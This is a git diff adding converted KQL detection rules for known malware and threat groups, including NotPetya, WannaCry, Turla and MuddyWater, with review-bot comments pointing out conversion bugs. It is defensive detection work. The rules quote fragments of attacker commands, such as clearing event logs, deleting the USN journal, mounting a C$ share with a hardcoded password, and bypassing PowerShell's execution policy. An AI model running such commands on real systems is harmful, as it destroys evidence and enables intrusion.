+| where (ProcessCommandLine contains "zxFunction" or ProcessCommandLine contains "RemoteDiskXXXXX") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql
new file mode 100644
index 00000000..69c36a2b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_commands_may_2020.kql
@@ -0,0 +1,10 @@
+// Title: Turla Group Commands May 2020
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-05-26
+// Level: critical
+// Description: Detects commands used by Turla group as reported by ESET in May 2020
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.g0010, attack.execution, attack.t1059.001, attack.t1053.005, attack.t1027, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "tracert -h 10 yahoo.com" or ProcessCommandLine contains ".WSqmCons))|iex;" or ProcessCommandLine contains "Fr`omBa`se6`4Str`ing") or (ProcessCommandLine contains "@aol.co.uk" and ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql
new file mode 100644
index 00000000..d12fb095
--- /dev/null
+++ b/KQL/rules-emerging-threats/2014/TA/Turla/turla_group_lateral_movement.kql
@@ -0,0 +1,10 @@
+// Title: Turla Group Lateral Movement
+// Author: Markus Neis
+// Date: 2017-11-07
+// Level: critical
+// Description: Detects automated lateral movement by Turla group
+// MITRE Tactic: Execution
+// Tags: attack.g0010, attack.execution, attack.t1059, attack.lateral-movement, attack.t1021.002, attack.discovery, attack.t1083, attack.t1135, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine startswith "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" " or (ProcessCommandLine contains "dir c:\\" and ProcessCommandLine contains ".doc" and ProcessCommandLine contains " /s") or (ProcessCommandLine contains "dir %TEMP%\\" and ProcessCommandLine contains ".exe")
\ No newline at end of file
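Review bot: In turla_group_commands_may_2020.kql (the first hunk on this line), `ProcessCommandLine matches regex "net\\s+use\\s+https://docs.live.net"` is the only case-sensitive term in the rule: KQL `contains` is case-insensitive but `matches regex` is not, so a command line such as `NET USE https://docs.live.net...` satisfies the surrounding `contains` terms yet never this one. The unescaped dots in `docs.live.net` also match any character rather than a literal dot. If the source Sigma rule intends case-insensitive matching (check its regex modifiers), the term should read `ProcessCommandLine matches regex "(?i)net\\s+use\\s+https://docs\\.live\\.net"`; the escaped dots are warranted either way. If the converter is what emits `matches regex` here, the escaping fix presumably belongs in the converter so every generated rule gets it.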
diff --git a/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql
new file mode 100644
index 00000000..a9ffd5af
--- /dev/null
+++ b/KQL/rules-emerging-threats/2015/Exploits/CVE-2015-1641/exploit_for_cve_2015_1641.kql
@@ -0,0 +1,10 @@
+// Title: Exploit for CVE-2015-1641
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: critical
+// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\MicroScMgmt.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql
new file mode 100644
index 00000000..490fe1d9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-0261/exploit_for_cve_2017_0261.kql
@@ -0,0 +1,12 @@
+// Title: Exploit for CVE-2017-0261
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: medium
+// Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-0261, detection.emerging-threats
+// False Positives:
+// - Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)
+
+DeviceProcessEvents
+| where FolderPath contains "\\FLTLDR.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql
new file mode 100644
index 00000000..d9a4601f
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-11882/droppers_exploiting_cve_2017_11882.kql
@@ -0,0 +1,10 @@
+// Title: Droppers Exploiting CVE-2017-11882
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-11-23
+// Level: critical
+// Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-11882, detection.emerging-threats
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql
new file mode 100644
index 00000000..9cd70a63
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Exploits/CVE-2017-8759/exploit_for_cve_2017_8759.kql
@@ -0,0 +1,10 @@
+// Title: Exploit for CVE-2017-8759
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-09-15
+// Level: critical
+// Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, attack.t1204.002, attack.initial-access, attack.t1566.001, cve.2017-8759, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\csc.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql b/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql
new file mode 100644
index 00000000..634c1049
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/Adwind-RAT/adwind_rat_jrat.kql
@@ -0,0 +1,10 @@
+// Title: Adwind RAT / JRAT
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community
+// Date: 2017-11-10
+// Level: high
+// Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppData\\Roaming\\Oracle" and ProcessCommandLine contains "\\java" and ProcessCommandLine contains ".exe ") or (ProcessCommandLine contains "cscript.exe" and ProcessCommandLine contains "Retrive" and ProcessCommandLine contains ".vbs ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql b/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql
new file mode 100644
index 00000000..a008eaeb
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/Fireball/fireball_archer_install.kql
@@ -0,0 +1,10 @@
+// Title: Fireball Archer Install
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-06-03
+// Level: high
+// Description: Detects Archer malware invocation via rundll32
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "rundll32.exe" and ProcessCommandLine contains "InstallArcherSvc"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql
new file mode 100644
index 00000000..38aaae2e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/NotPetya/notpetya_ransomware_activity.kql
@@ -0,0 +1,10 @@
+// Title: NotPetya Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi
+// Date: 2019-01-16
+// Level: critical
+// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats
+
+DeviceProcessEvents
+| where "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" or ProcessCommandLine endswith ".dat #1" or ProcessCommandLine endswith ".zip.dll\",#1") and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine contains "wevtutil cl Application & fsutil usn deletejournal /D C:" or ProcessCommandLine contains "dllhost.dat %WINDIR%\\ransoms")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql b/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql
new file mode 100644
index 00000000..ffe1c480
--- /dev/null
+++ b/KQL/rules-emerging-threats/2017/Malware/PlugX/potential_plugx_activity.kql
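Review bot: The first term of the `where` in notpetya_ransomware_activity.kql, `"\\perfc.dat" or (...)`, is a bare string literal rather than a predicate, so the query is rejected at execution time (operands of `or` must be boolean) and this critical-level rule never runs. The field from the source Sigma selection appears to have been dropped during conversion; the term presumably should be something like `FolderPath endswith "\\perfc.dat"` (or a match on `ProcessVersionInfoOriginalFileName`) — confirm against the Sigma rule before changing it. Because this file is produced by the automated conversion step, the more durable fix is to have that step reject any generated `where` term that references no column, so a broken rule fails the workflow instead of being proposed for merge as if it were valid.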
@@ -0,0 +1,10 @@ +// Title: Potential PlugX Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-12 +// Level: high +// Description: Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.s0013, attack.defense-evasion, attack.t1574.001, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\CamMute.exe" and (not((FolderPath contains "\\Lenovo\\Communication Utility\\" or FolderPath contains "\\Lenovo\\Communications Utility\\")))) or (FolderPath endswith "\\chrome_frame_helper.exe" and (not(FolderPath contains "\\Google\\Chrome\\application\\"))) or (FolderPath endswith "\\dvcemumanager.exe" and (not(FolderPath contains "\\Microsoft Device Emulator\\"))) or (FolderPath endswith "\\Gadget.exe" and (not(FolderPath contains "\\Windows Media Player\\"))) or (FolderPath endswith "\\hcc.exe" and (not(FolderPath contains "\\HTML Help Workshop\\"))) or (FolderPath endswith "\\hkcmd.exe" and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysNative\\" or FolderPath contains "\\SysWow64\\")))) or (FolderPath endswith "\\Mc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit")))) or (FolderPath endswith "\\MsMpEng.exe" and (not((FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Windows Defender\\" or FolderPath contains "\\AntiMalware\\")))) or (FolderPath endswith "\\msseces.exe" and (not((FolderPath contains "\\Microsoft Security Center\\" or FolderPath contains "\\Microsoft Security Client\\" or FolderPath contains "\\Microsoft Security Essentials\\")))) or (FolderPath endswith "\\OInfoP11.exe" and (not(FolderPath contains "\\Common Files\\Microsoft Shared\\"))) or (FolderPath endswith "\\OleView.exe" and 
(not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\")))) or (FolderPath endswith "\\rc.exe" and (not((FolderPath contains "\\Microsoft Visual Studio" or FolderPath contains "\\Microsoft SDK" or FolderPath contains "\\Windows Kit" or FolderPath contains "\\Windows Resource Kit\\" or FolderPath contains "\\Microsoft.NET\\")))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql b/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql new file mode 100644 index 00000000..beaad77c --- /dev/null +++ b/KQL/rules-emerging-threats/2017/Malware/WannaCry/wannacry_ransomware_activity.kql @@ -0,0 +1,10 @@ +// Title: WannaCry Ransomware Activity +// Author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro +// Date: 2019-01-16 +// Level: critical +// Description: Detects WannaCry ransomware activity +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.t1210, attack.discovery, attack.t1083, attack.defense-evasion, attack.t1222.001, attack.impact, attack.t1486, attack.t1490, detection.emerging-threats + +DeviceProcessEvents +| where ProcessCommandLine contains "@Please_Read_Me@.txt" or ((FolderPath endswith "\\tasksche.exe" or FolderPath endswith "\\mssecsvc.exe" or FolderPath endswith "\\taskdl.exe" or FolderPath endswith "\\taskhsvc.exe" or FolderPath endswith "\\taskse.exe" or FolderPath endswith "\\111.exe" or FolderPath endswith "\\lhdfrgui.exe" or FolderPath endswith "\\linuxnew.exe" or FolderPath endswith "\\wannacry.exe") or FolderPath contains "WanaDecryptor") \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql b/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql new file mode 100644 index 00000000..f50e6cdd --- /dev/null +++ b/KQL/rules-emerging-threats/2017/TA/APT10/potential_apt10_cloud_hopper_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential APT10 Cloud Hopper Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2017-04-07 +// Level: high +// Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation +// MITRE Tactic: Execution +// Tags: attack.execution, attack.g0045, attack.t1059.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains ".vbs /shell " and FolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "csvde -f C:\\windows\\web\\" and ProcessCommandLine contains ".log") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql b/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql new file mode 100644 index 00000000..26162c2d --- /dev/null +++ b/KQL/rules-emerging-threats/2017/TA/Dragonfly/ps_exe_renamed_sysinternals_tool.kql @@ -0,0 +1,12 @@ +// Title: Ps.exe Renamed SysInternals Tool +// Author: Florian Roth (Nextron Systems) +// Date: 2017-10-22 +// Level: high +// Description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.g0035, attack.t1036.003, car.2013-05-009, detection.emerging-threats +// False Positives: +// - Renamed SysInternals tool + +DeviceProcessEvents +| where ProcessCommandLine contains "ps.exe -accepteula" and ProcessCommandLine contains "-s cmd /c netstat" \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql new file mode 100644 index 00000000..577ea20e --- /dev/null +++ b/KQL/rules-emerging-threats/2017/TA/Lazarus/lazarus_system_binary_masquerading.kql @@ -0,0 +1,12 @@ +// Title: Lazarus System Binary Masquerading +// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1) +// Date: 2020-06-03 +// Level: high +// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\msdtc.exe" or FolderPath endswith "\\gpsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql b/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql new file mode 100644 index 00000000..b5aced43 --- /dev/null +++ b/KQL/rules-emerging-threats/2017/TA/Pandemic/pandemic_registry_key.kql @@ -0,0 +1,10 @@ +// Title: Pandemic Registry Key +// Author: Florian Roth (Nextron Systems) +// Date: 2017-06-01 +// Level: critical +// Description: Detects Pandemic Windows Implant +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\services\\null\\Instance" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql b/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql new file mode 100644 index 00000000..d96919dd --- /dev/null 
+++ b/KQL/rules-emerging-threats/2018/Malware/Elise-Backdoor/elise_backdoor_activity.kql @@ -0,0 +1,12 @@ +// Title: Elise Backdoor Activity +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-01-31 +// Level: critical +// Description: Detects Elise backdoor activity used by APT32 +// MITRE Tactic: Execution +// Tags: attack.g0030, attack.g0050, attack.s0081, attack.execution, attack.t1059.003, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\Windows\\Caches\\NavShExt.dll" and ProcessCommandLine contains "/c del") or FolderPath endswith "\\Microsoft\\Network\\svchost.exe") or (ProcessCommandLine contains ",Setting" and (ProcessCommandLine endswith "\\AppData\\Roaming\\MICROS~1\\Windows\\Caches\\NavShExt.dll" or ProcessCommandLine endswith "\\AppData\\Roaming\\Microsoft\\Windows\\Caches\\NavShExt.dll")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql new file mode 100644 index 00000000..5ca2cf40 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/APT27/apt27_emissary_panda_activity.kql 
@@ -0,0 +1,12 @@ +// Title: APT27 - Emissary Panda Activity +// Author: Florian Roth (Nextron Systems) +// Date: 2018-09-03 +// Level: critical +// Description: Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27 +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0027, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath endswith "\\sllauncher.exe") or (ProcessCommandLine contains "-k" and FolderPath endswith "\\svchost.exe" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql new file mode 100644 index 00000000..6bf7a8d0 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/APT28/sofacy_trojan_loader_activity.kql @@ -0,0 +1,10 @@ +// Title: Sofacy Trojan Loader Activity +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community +// Date: 2018-03-01 +// Level: high +// Description: Detects Trojan loader activity as used by APT28 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.g0007, attack.t1059.003, attack.t1218.011, car.2013-10-002, detection.emerging-threats + +DeviceProcessEvents +| where ((ProcessCommandLine contains ".dat\"," or (ProcessCommandLine endswith ".dll #1" or ProcessCommandLine endswith ".dll\" #1" or ProcessCommandLine endswith ".dll\",#1")) and ((ProcessCommandLine contains "%LOCALAPPDATA%" or ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\rundll32.exe")) and (not(ProcessCommandLine contains "\\AppData\\Local\\Temp\\")) \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql new file mode 100644 index 00000000..19465ea3 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_commandline_indicators.kql @@ -0,0 +1,12 @@ +// Title: APT29 2018 Phishing Campaign CommandLine Indicators +// Author: Florian Roth (Nextron Systems), @41thexplorer +// Date: 2018-11-20 +// Level: critical +// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "-noni -ep bypass $" or (ProcessCommandLine contains "cyzfc.dat," and ProcessCommandLine contains "PointFunctionCall") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql new file mode 100644 index 00000000..8f93e799 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/APT29-CozyBear/apt29_2018_phishing_campaign_file_indicators.kql @@ -0,0 +1,12 @@ +// Title: APT29 2018 Phishing Campaign File Indicators +// Author: @41thexplorer +// Date: 2018-11-20 +// Level: critical +// Description: Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath contains "ds7002.lnk" or FolderPath contains "ds7002.pdf" or FolderPath contains "ds7002.zip" \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql b/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql new file mode 100644 index 00000000..4a349ff4 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/APT32-Oceanlotus/oceanlotus_registry_activity.kql @@ -0,0 +1,10 @@ +// Title: OceanLotus Registry Activity +// Author: megan201296, Jonhnathan Ribeiro +// Date: 2019-04-14 +// Level: critical +// Description: Detects registry keys created in OceanLotus (also known as APT32) attacks +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats + +DeviceRegistryEvents +| where RegistryKey contains "\\SOFTWARE\\Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model" or (RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*" or RegistryKey endswith "Classes\\AppX3bbba44c6cae4d9695755183472171e2*" or RegistryKey endswith "Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B}*" or RegistryKey contains "Classes\\CLSID\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\Model") or (RegistryKey endswith "\\SOFTWARE\\App*" and ((RegistryKey endswith "AppXbf13d4ea2945444d8b13e2121cb6b663*" or RegistryKey endswith "AppX70162486c7554f7f80f481985d67586d*" or RegistryKey endswith "AppX37cc7fdccd644b4f85f4b22d5a3f105a*") and (RegistryKey endswith "Application" or RegistryKey endswith "DefaultIcon"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql new file mode 100644 index 00000000..defe9e0d --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/MuddyWater/potential_muddywater_apt_activity.kql 
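Review bot: Several literals in the OceanLotus `where` clause keep a trailing Sigma wildcard, for example `RegistryKey endswith "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a*"` and `RegistryKey endswith "\\SOFTWARE\\App*"`; KQL `endswith` is literal, so these only match a key that really ends in `*` and are dead. The final group is contradictory as written, since a key cannot end with `AppXbf13d4ea2945444d8b13e2121cb6b663*` and also end with `Application` or `DefaultIcon`. For each such literal the `*` should be stripped and the operator relaxed, e.g. `RegistryKey contains "Classes\\AppXc52346ec40fb4061ad96be0e6cb7d16a"` and `RegistryKey contains "\\SOFTWARE\\App"`; this belongs in the converter's wildcard handling rather than in hand edits to the output.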
@@ -0,0 +1,12 @@ +// Title: Potential MuddyWater APT Activity +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-10 +// Level: high +// Description: Detects potential Muddywater APT activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.g0069, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "vbscript:Close(Execute(\"CreateObject(" and ProcessCommandLine contains "powershell" and ProcessCommandLine contains "-w 1 -exec Bypass" and ProcessCommandLine contains "\\ProgramData\\") or (ProcessCommandLine contains "[Convert]::ToBase64String" and ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString]" and ProcessCommandLine contains "GetResponse().GetResponseStream()" and ProcessCommandLine contains "[System.Net.HttpWebRequest]::Create(" and ProcessCommandLine contains "-bxor ") or (ProcessCommandLine contains "Win32_OperatingSystem" and ProcessCommandLine contains "Win32_NetworkAdapterConfiguration" and ProcessCommandLine contains "root\\SecurityCenter2" and ProcessCommandLine contains "[System.Net.DNS]") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql new file mode 100644 index 00000000..cbfa9fa2 --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_activity.kql 
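Review bot: The literal `"[System.Text.Encoding]::UTF8.GetString]"` in the second MuddyWater branch has an unbalanced closing bracket; a well-formed PowerShell invocation reads `[System.Text.Encoding]::UTF8.GetString(`, so that substring is unlikely to occur, and because the four `contains` terms are ANDed the whole branch would then never fire. If the string is verbatim from the Sigma source it is an upstream typo worth reporting; otherwise it is a conversion artefact. The likely intent is `ProcessCommandLine contains "[System.Text.Encoding]::UTF8.GetString("` — confirm against the source before changing it.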
@@ -0,0 +1,12 @@ +// Title: OilRig APT Activity +// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +// Date: 2018-03-23 +// Level: critical +// Description: Detects OilRig activity as reported by Nyotron in their March 2018 report +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.g0049, attack.t1053.005, attack.s0111, attack.t1543.003, attack.defense-evasion, attack.t1112, attack.command-and-control, attack.t1071.004, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "nslookup.exe" and ProcessCommandLine contains "-q=TXT") and InitiatingProcessFolderPath endswith "\\local\\microsoft\\Taskbar\\autoit3.exe") or (ProcessCommandLine contains "SC Scheduled Scan" and ProcessCommandLine contains "\\microsoft\\Taskbar\\autoit3.exe") or ((ProcessCommandLine contains "i" or ProcessCommandLine contains "u") and FolderPath =~ "C:\\Windows\\system32\\Service.exe") or (FolderPath contains "\\Windows\\Temp\\DB\\" and FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql new file mode 100644 index 00000000..da5c71ca --- /dev/null +++ b/KQL/rules-emerging-threats/2018/TA/OilRig/oilrig_apt_registry_persistence.kql 
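Review bot: `(ProcessCommandLine contains "i" or ProcessCommandLine contains "u")` in the third OilRig branch is effectively always true, since nearly every command line contains an `i` or a `u`, so only `FolderPath =~ "C:\\Windows\\system32\\Service.exe"` is doing any work there. If the Sigma source listed `i` and `u` as whole command-line values rather than substrings, the converted form should be an exact match such as `ProcessCommandLine in~ ("i", "u")`; confirm against the source. This looks like a conversion artefact (a bare value mapped to `contains`) that may also affect other very short selection values elsewhere in the diff.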
